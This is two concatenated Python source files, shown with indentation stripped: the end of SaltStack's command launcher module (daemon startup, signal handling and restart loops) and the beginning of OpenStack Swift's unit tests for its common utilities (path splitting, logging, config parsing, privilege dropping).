Escalate the signal received to the multiprocessing process that
is actually running the minion
'''
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(signal.SIGTERM,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGINT,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGHUP,
functools.partial(escalate_signal_to_process,
process.pid))
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
# Process exited or was terminated. Since we're going to try to restart
# it, we MUST, reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
sys.exit(process.exitcode)
# ontop of the random_reauth_delay already preformed
# delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
import salt.cli.daemons
import salt.utils.platform
# salt_minion spawns this function in a new process
lock = threading.RLock()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
'''
while lock.acquire(blocking=False):
lock.release()
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
try:
if not salt.utils.platform.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
status = salt.defaults.exitcodes.EX_OK
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc: # pylint: disable=broad-except
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
# status is superfluous since the process will be restarted
status = salt.defaults.exitcodes.SALT_KEEPALIVE
except SystemExit as exc:
restart = False
status = exc.code
finally:
lock.acquire(blocking=True)
if restart is True:
log.warning('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of %s seconds', random_delay)
# preform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
sys.exit(status)
def salt_proxy():
'''
Start a proxy minion.
'''
import salt.cli.daemons
import salt.utils.platform
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.platform.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception: # pylint: disable=broad-except
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception: # pylint: disable=broad-except
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
sys.exit(process.exitcode)
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
try:
client = salt.cli.key.SaltKey()
_install_signal_handlers(client)
client.run()
except Exception as err: # pylint: disable=broad-except
sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = salt.cli.cp.SaltCPCli()
_install_signal_handlers(client)
client.run()
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = salt.cli.call.SaltCall()
_install_signal_handlers(client)
client.run()
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = salt.cli.run.SaltRun()
_install_signal_handlers(client)
client.run()
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
try:
client = salt.cli.ssh.SaltSSH()
_install_signal_handlers(client)
client.run()
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
# Define 'salt' global so we may use it after ImportError. Otherwise,
# UnboundLocalError will be raised.
global salt # pylint: disable=W0602
try:
# Late-imports for CLI performance
import salt.cloud
import salt.cloud.cli
except ImportError as e:
# No salt cloud on Windows
log.error('Error importing salt cloud: %s', e)
print('salt-cloud is not available in this system')
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
if '' in sys.path:
sys.path.remove('')
client = salt.cloud.cli.SaltCloud()
_install_signal_handlers(client)
client.run()
def salt_api():
'''
The main function for salt-api
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = salt.cli.salt.SaltCMD()
_install_signal_handlers(client)
client.run()
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
def salt_extend(extension, name, description, salt_dir, merge):
'''
Quickstart for developing on the saltstack installation
.. versionadded:: 2016.11.0
'''
import salt.utils.extend
salt.utils.extend.run(extension=extension,
name=name,
description=description,
salt_dir=salt_dir,
merge=merge)
def salt_unity():
'''
Change the args and redirect to another salt script
'''
avail = []
for fun in dir(sys.modules[__name__]):
if fun.startswith('salt'):
avail.append(fun[5:])
if len(sys.argv) < 2:
msg = 'Must pass in a salt command, available commands are:'
for cmd in avail:
msg += '\n{0}'.format(cmd)
print(msg)
sys.exit(1)
cmd = sys.argv[1]
if cmd not in avail:
# Fall back to the salt command
sys.argv[0] = 'salt'
s_fun = salt_main
else:
sys.argv[0] = 'salt-{0}'.format(cmd)
sys.argv.pop(1)
s_fun = getattr(sys.modules[__name__], 'salt_{0}'.format(cmd))
s_fun()
|
test_utils.py
|
# Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import with_statement
from test.unit import temptree
import ctypes
import errno
import eventlet
import logging
import os
import random
import re
import socket
import sys
from textwrap import dedent
import tempfile
import threading
import time
import unittest
import fcntl
import shutil
from contextlib import nested
from Queue import Queue, Empty
from getpass import getuser
from shutil import rmtree
from StringIO import StringIO
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from swift.common.exceptions import (Timeout, MessageTimeout,
ConnectionTimeout, LockTimeout)
from swift.common import utils
from swift.common.swob import Response
from test.unit import FakeLogger
class MockOs():
def __init__(self, pass_funcs=[], called_funcs=[], raise_funcs=[]):
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket():
def __init__(self):
self.sent = []
def sendto(self, data, target):
self.sent.append((data, target))
def close(self):
pass
class MockSys():
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.thread_locals = (None, None)
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = ['123456789x12345678><123456789\n', # block larger than rest
'123456789x123>\n', # block ends just before \n character
'123423456789\n',
'123456789x\n', # block ends at the end of line
'<123456789x123456789x123\n',
'<6789x123\n', # block ends at the beginning of the line
'6789x1234\n',
'1234><234\n', # block ends typically in the middle of line
'123456789x123456789\n']
with TemporaryFile('r+w') as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEquals(line, lines[count].split('\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEquals([], list(utils.backward(f)))
def test_mkdirs(self):
testroot = os.path.join(os.path.dirname(__file__), 'mkdirs')
try:
os.unlink(testroot)
except Exception:
pass
rmtree(testroot, ignore_errors=1)
self.assert_(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assert_(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assert_(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assert_(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assert_(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
def test_split_path(self):
# Test swift.common.utils.split_account_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEquals(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEquals(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEquals(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEquals(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEquals(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEquals(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEquals(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo = utils.LoggerFileObject(logger)
print 'test1'
self.assertEquals(sio.getvalue(), '')
sys.stdout = lfo
print 'test2'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo
print >> sys.stderr, 'test4'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
sys.stdout = orig_stdout
print 'test5'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
print >> sys.stderr, 'test6'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
sys.stderr = orig_stderr
print 'test8'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
lfo.writelines(['a', 'b', 'c'])
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\n')
lfo.close()
lfo.write('d')
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo.flush()
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assert_(got_exc)
got_exc = False
try:
for line in lfo.xreadlines():
pass
except Exception:
got_exc = True
self.assert_(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEquals(conf, conf_file)
# assert defaults
self.assertEquals(options['verbose'], False)
self.assert_('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEquals(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEquals(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['verbose'], True)
self.assertEquals(options['once'], True)
self.assertEquals(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assert_('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assert_('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warn('test1')
self.assertEquals(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEquals(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEquals(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warn('test4')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEquals(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEquals(strip_value(sio), '')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\n')
self.assertEquals(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\ntest\n')
self.assertEquals(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assert_('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('errno.ECONNREFUSED message test' not in log_msg)
self.assert_('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('ConnectionTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('MessageTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('txn' in log_msg)
self.assert_('12345' in log_msg)
# test no txn on info message
self.assertEquals(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('txn' not in log_msg)
self.assert_('12345' not in log_msg)
# test txn already in message
self.assertEquals(logger.txn_id, '12345')
logger.warn('test 12345 test')
self.assertEquals(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assert_('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('client_ip' in log_msg)
self.assert_('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('client_ip' not in log_msg)
self.assert_('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.warn('test 1.2.3.4 test 12345')
self.assertEquals(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_whataremyips(self):
myips = utils.whataremyips()
self.assert_(len(myips) > 1)
self.assert_('127.0.0.1' in myips)
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with nested(
patch('netifaces.interfaces', my_interfaces),
patch('netifaces.ifaddresses', my_ifaddress_error)):
self.assertEquals(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with nested(
patch('netifaces.interfaces', my_ipv6_interfaces),
patch('netifaces.ifaddresses', my_ipv6_ifaddresses)):
myips = utils.whataremyips()
self.assertEquals(len(myips), 1)
self.assertEquals(myips[0], test_ipv6_address)
def test_load_libc_function(self):
self.assert_(callable(
utils.load_libc_function('printf')))
self.assert_(callable(
utils.load_libc_function('some_not_real_function')))
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEquals(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEquals(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEquals(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEquals(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
import pwd
self.assertEquals(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds)
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, [])
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assert_(utils.sys.excepthook is not None)
